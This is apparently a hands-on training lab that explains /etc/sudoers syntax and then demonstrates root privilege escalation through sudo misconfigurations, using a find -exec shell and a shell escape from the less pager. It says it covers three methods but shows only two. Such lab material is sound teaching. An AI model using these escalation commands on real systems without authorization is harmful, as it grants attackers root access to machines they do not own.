In this lab, you will learn about the sudo configuration file syntax and practice three common methods to escalate privileges through sudo vulnerabilities or misconfigurations. The goal is to gain a better understanding of how to leverage sudo for privilege escalation during a penetration test.
In this step, you will learn about the syntax of the /etc/sudoers file, which is used to configure sudo privileges.
The /etc/sudoers file is used to specify which users or groups can run commands with elevated privileges. To view and save the contents of the /etc/sudoers file, run the following command:
sudo cat /etc/sudoers | grep root > /home/labex/project/sudoers.txtThe output should look similar to the following:
## This file MUST be edited with the 'visudo' command as root.
## This preserves proxy settings from user environments of root
## While you shouldn't normally run git as root, you need to with etckeeper
## Per-user preferences; root won't have sensible values for them.
root ALL=(ALL:ALL) ALL
## Members of the admin group may gain root privilegesThis line specifies that the root user can run any command as any user or group on all hosts.
The general syntax for a sudoers entry is:
user_or_group_name host_list=(run_as_user:run_as_group) command_listuser_or_group_name: The user or group to whom the rule applies.host_list: The host(s) on which the rule applies. The value ALL means all hosts.run_as_user: The user whose privileges are used to run the command. The value ALL means any user.run_as_group: The group whose privileges are used to run the command. The value ALL means any group.command_list: The command(s) that the user or group is allowed to run.In this step, you will practice escalating privileges by taking advantage of sudo misconfigurations that allow running any command with elevated privileges.
First, open a terminal and navigate to the /home/labex/project directory.
cd /home/labex/projectInitialize the environment by running the following command:
./env_setup_1.shYou are now logged in as the user001 user.
Use the sudo -l command to check your sudo privileges:
sudo -l(root) NOPASSWD:/usr/bin/findThis means you can run the find command with root privileges without a password.
To escalate privileges, run:
sudo find /home -exec /bin/bash \;You should now have a root shell.
Create a file named success_1.txt in the /root directory to verify that you have root privileges:
echo "success_1" | sudo tee /root/success_1.txtVerify the file by running:
cat /root/success_1.txtThe output should be success_1.
In this step, you will practice escalating privileges by taking advantage of sudo misconfigurations that allow running specific commands with elevated privileges.
After last step, you are still logged in as the root user, for the continuation of this step, you need close the current terminal and open a new terminal.
First, open a terminal and navigate to the /home/labex/project directory.
cd /home/labex/projectInitialize the environment by running the following command:
./env_setup_2.shCheck your sudo privileges with sudo -l:
sudo -lExpected output:
(root) NOPASSWD: /bin/less /var/log/messagesThis means you can run the command /bin/less /var/log/messages with root privileges without a password.
To escalate privileges, run:
sudo less /var/log/messagesOnce inside the less pager, run:
!/bin/bashYou should now have a root shell.
Create a file named success_2.txt in the /root directory to verify that you have root privileges:
echo "success_2" | sudo tee /root/success_2.txtVerify the file by running:
cat /root/success_2.txtThe output should be success_2.
In this lab, you learned about the syntax of the /etc/sudoers file and how to configure sudo privileges. You also practiced three common methods to escalate privileges through sudo misconfigurations or vulnerabilities. By understanding how to leverage sudo for privilege escalation, you can better assess and mitigate potential security risks in Linux systems.